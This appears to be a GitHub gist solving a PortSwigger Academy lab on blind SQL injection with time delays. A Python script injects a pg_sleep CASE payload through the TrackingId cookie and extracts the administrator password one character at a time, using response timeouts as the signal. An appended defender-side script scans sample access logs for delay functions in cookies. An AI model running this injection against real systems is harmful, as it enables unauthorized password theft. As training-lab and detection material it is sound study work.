@thewhiteh4t
Last active May 11, 2021 17:46
Portswigger Academy Blind SQL injection with time delays and information retrieval solution
#!/usr/bin/env python3
import requests

# Lab instance URL and the session cookie captured from the browser (both instance-specific).
url = 'https://ac8b1f4b1e6ce1ca80d12b3a001600d1.web-security-academy.net/'
max_len = 21      # password positions 1..20 are tested
min_len = 1
timeout = 10      # seconds the true branch sleeps via pg_sleep()
charset = 'abcdefghijklmnopqrstuvwxyz1234567890!@#$'
password = ''
s = requests.Session()

for i in range(min_len, max_len):
    print(f'[!] Brute forcing character {i}...')
    for char in charset:
        # Conditional delay: the query only sleeps when the guessed character is correct.
        payload = f"'%3BSELECT+CASE+WHEN+(username='administrator')+AND+substring(password,{i},1)='{char}'+THEN+pg_sleep({timeout})+ELSE+pg_sleep(0)+END+FROM+users--"
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0'
        }
        cookies = {
            'TrackingId': f'x{payload}',
            'session': 'SlLKMHaUhxEeIX0ujm22zMcRzquHgI68'
        }
        try:
            # The client timeout is shorter than pg_sleep(), so a correct guess surfaces as ReadTimeout.
            s.get(url, headers=headers, cookies=cookies, timeout=timeout - 1)
        except requests.exceptions.ReadTimeout:
            password += char
            print(f'[+] PASSWORD : {password}')
            break
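Added defender-side example (not part of the gist): detection logic that scans constructed access-log lines for the kind of payload the script above puts in the TrackingId cookie. The log format, the SLOW_MS threshold and the function names are assumptions; the point it makes is that the ELSE pg_sleep(0) branch answers quickly, so a fast response with a delay primitive in the cookie is still an attempt and must not be dropped on latency alone.

```python
#!/usr/bin/env python3
"""Flag time-based SQL injection attempts carried in a tracking cookie (defender-side)."""
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). Assumed format, one request per line:
# method path status duration_ms raw_cookie_header
SAMPLE_LOG = """\
GET / 200 312 TrackingId=kQ2pL9xZr3Vb8Wq1; session=abc
GET / 200 10007 TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+AND+substring(password,1,1)='a'+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--; session=abc
GET / 200 8 TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+AND+substring(password,1,1)='b'+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--; session=abc
GET /my-account 200 9800 TrackingId=p7Ws2Lq0Zx; session=abc
"""

# Time-delay primitives of common databases; matched after URL-decoding so '+' and %XX do not hide them.
DELAY_FUNCS = re.compile(
    r"pg_sleep\s*\(|\bsleep\s*\(|waitfor\s+delay|benchmark\s*\(", re.IGNORECASE
)
SLOW_MS = 5000  # assumed threshold: at or above this the injected delay is taken to have fired

def parse_cookies(raw):
    """Turn 'a=1; b=2' into a dict, URL-decoding values (the payload arrives encoded)."""
    cookies = {}
    for part in raw.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = unquote_plus(value)
    return cookies

def classify(line):
    """Return 'delay-triggered', 'probe' or None for one log line."""
    _method, _path, _status, duration_ms, raw_cookie = line.split(" ", 4)
    tracking = parse_cookies(raw_cookie).get("TrackingId", "")
    if not DELAY_FUNCS.search(tracking):
        return None  # a slow but clean request is not evidence on its own
    # The ELSE pg_sleep(0) branch answers fast, so a fast response with a delay
    # primitive in the cookie is still an attempt, just one whose guess was wrong.
    return "delay-triggered" if int(duration_ms) >= SLOW_MS else "probe"

def scan(log_text):
    """Return (line_no, verdict, decoded TrackingId) for every flagged request."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict, parse_cookies(line.split(" ", 4)[4])["TrackingId"]))
    return hits
```

Both flagged lines come from the same session cookie, so in practice the per-session count of "probe" verdicts is the stronger signal than any single slow request.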